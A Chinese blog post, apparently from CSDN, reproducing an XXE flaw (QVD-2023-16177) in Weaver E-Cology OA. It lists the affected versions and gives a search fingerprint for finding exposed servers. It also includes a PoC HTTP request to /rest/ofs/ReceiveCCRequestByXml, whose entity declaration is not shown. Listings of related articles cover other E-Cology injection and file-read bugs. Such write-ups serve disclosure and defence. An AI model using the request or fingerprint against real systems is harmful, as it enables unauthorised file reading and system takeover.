泛微E-Cology XXE漏洞复现(QVD-2023-16177)

已于 2023-07-23 13:59:42 修改
阅读量5.9k 收藏 4
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
于 2023-07-23 13:17:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/131878446
版权

0x01 产品简介

      泛微协同管理应用平台E-Cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

0x02 漏洞概述

   泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。

0x03 影响范围

  泛微 EC 9.x 且补丁版本 < 10.58.2

  泛微 EC 8.x 且补丁版本 < 10.58.2

0x04 复现环境 

鹰图指纹:app.name="泛微 e-cology 9.0 OA"

d118863013174d94b22490499a6f40c1.png 

0x05 漏洞复现 

PoC

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml

<M><syscode>&send;</syscode></M>

b34738e52adf424f9d3925e6b63874f5.png

 出现以上响应则存在漏洞

 exp1

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
做自己喜欢的事,并将其发挥到极致!
05-10 3055
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微新一代移动办公平台E-Cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件,实体签章的方式,泛微OA E-Cology平台browser.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
E-Office(泛微OA)前台任意文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-05 1180
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。在该产品前台登录页存在文件读取漏洞。officeserver.php文件存在任意文件读取漏洞,通过漏洞可以下载服务器上的任意文件。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0
siu~
08-29 1203
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0的设计中旨是为了帮助各位师傅在渗透测试和挖洞中以及攻防演练中能够快速对OA系统进行快速定位进行漏洞检测和利用.,目前已实现20款OA系统的漏洞检测和利用,共133个漏洞.听说day一打一个准,也欢迎各位师傅补充漏洞和反馈误报,我们将积极作出调整和完善.
2021-泛微OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
漏洞复现泛微OA E-Cology ln.FileDownload 任意文件读取漏洞
最新发布
凝聚力安全团队
06-18 409
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。e-cology平台提供了一系列协同办公工具,包括在线办公应用、文档管理、任务管理、日程安排、电子邮件和即时通讯等。泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。。
xxe注入漏洞
m0_55306747的博客
08-05 1263
1.我们知道xml文档由xml标记语言进行编写,可以自定义标签以及属性而dtd文档的存在则是去约束这个自定义的范围,让其趋近于某个规则,使其标准化格式化,方便数据传递与处理。2.dtd文档可以写在xml文档的开头,这样的dtd文档被成为内部声明当然也可以通过dtd的语法引用外部dtd文档的内容,这种dtd文档的嵌入方法称为外部声明(ps:可以类比一下html文件的css)实体就是代表,就是变量,是快捷引用一段内容,快捷引用一段文本的一种方式,比如.........
泛微OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
泛微E-cology8管理员后端维护手册全套
09-30
泛微E-cology8是一款企业级的协同办公自动化(OA)系统,专为现代企业管理设计,提供全面的后端维护支持。这套“泛微E-cology8管理员后端维护手册全套”涵盖了OA系统中所有后端模块的详细操作和维护指南,旨在帮助...
泛微E-cology9.0(EC9)官方前台全套操作手册
09-29
泛微E-cology9.0(EC9)是一款先进的企业协同办公系统,专为提升企业工作效率而设计。这个官方前台操作手册包含了全面的用户指南,帮助操作人员熟练掌握系统的各项功能和应用。以下是对手册中可能涉及的主要知识点的...
泛微E-cology 二次开发Java Jar包
08-13
泛微E-cology是一款国内知名的协同办公自动化系统,主要用于企业信息化建设,提升工作效率。它的二次开发功能使得用户可以根据自身需求定制化系统,扩展其功能。本文将深入探讨“泛微E-cology 二次开发Java Jar包”...
细节揭示:XXE漏洞复现步骤及安全防护建议
weixin_43263566的博客
08-31 286
XXE漏洞发生在那些使用XML解析器处理用户提供的XML输入的应用程序中。攻击者通过在用户输入的XML文档中插入恶意的实体引用,来触发XML解析器加载外部实体。这些外部实体可能指向本地文件系统或通过网络访问的远程资源。
漏洞复现-泛微WeaverOA系列
aming小老弟
10-03 1061
泛微OA
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 7744
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
泛微最新漏洞汇总----实时更新!!!_泛微漏洞(1),腾讯大牛教你自己写网络安全框架
2401_83974087的博客
04-14 427
app.name=“泛微 e-cology 9.0 OA”
泛微OA e-cology FileDownloadForOutDoc前台SQL注入漏洞
maverickpig的博客
08-09 1777
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。更多复现文章可关注:网安小白成长日记。
复现泛微-EOfficeOA信息泄露漏洞_41
fushuang333的博客
02-06 913
复现泛微-EOfficeOA信息泄露漏洞,未授权导致一些敏感配置信息泄露,可能造成系统危害以及重要信息泄露。
【严重】泛微 e-cology <10.58.3 任意文件上传漏洞
murphysec的博客
08-04 1065
OSCS是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业微信机器人获取一手的情报。泛微 e-cology 10.58.3之前版本存在任意文件上传漏洞,由于上传接口身份认证缺失,未经过身份验证的攻击者可以构造恶意请求将文件上传至服务器,攻击者可能通过上传jsp文件,从而远程执行任意命令。泛微协同管理应用平台(e-cology)是一套企业大型协同管理平台。
XXE漏洞安全-全网最详细讲解】
LCW991207的博客
08-04 4625
XXE(XML External Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入,将外部实体(external entity)引用进来,然后利用这些实体来获取敏感信息或进行其他攻击。
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以通过构造恶意的XML实体并将其发送给系统,然后利用系统对外部实体的解析不当来读取系统中的文件,包括敏感的配置文件、数据库信息。攻击者还可以通过XXE漏洞发起钓鱼攻击或者是向系统发送恶意的请求来进一步导致系统的安全漏洞。 为了防范泛微OA的XXE漏洞,建议以下几点: 1. 进行安全审计:对泛微OA系统进行定期的安全审计,通过检测系统中的漏洞和弱点,及时修复存在的XXE漏洞。 2. 模板限制:在处理外部XML实体时,应限制或阻止对外部实体的解析,避免可能的XXE攻击。可以通过设置合适的解析选项,限制对外部实体的访问权限。 3. 输入验证与过滤:对于用户输入的数据,应进行合理的验证和过滤,确保输入的内容符合预期格式,避免恶意的外部实体注入。 4. 更新补丁:定期保持泛微OA系统的更新与升级,及时安装官方发布的补丁和修复漏洞的版本。 5. 安全意识培训:加强企业员工的安全意识培训,提高他们对XXE漏洞及其他安全威胁的认识,避免因无意中点击恶意链接或下载恶意附件而导致漏洞的利用。 通过以上措施,可以有效地减少泛微OA中的XXE漏洞,提升系统的安全性。及早识别并修复漏洞,有助于保护企业的机密信息以及防止潜在的安全威胁发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值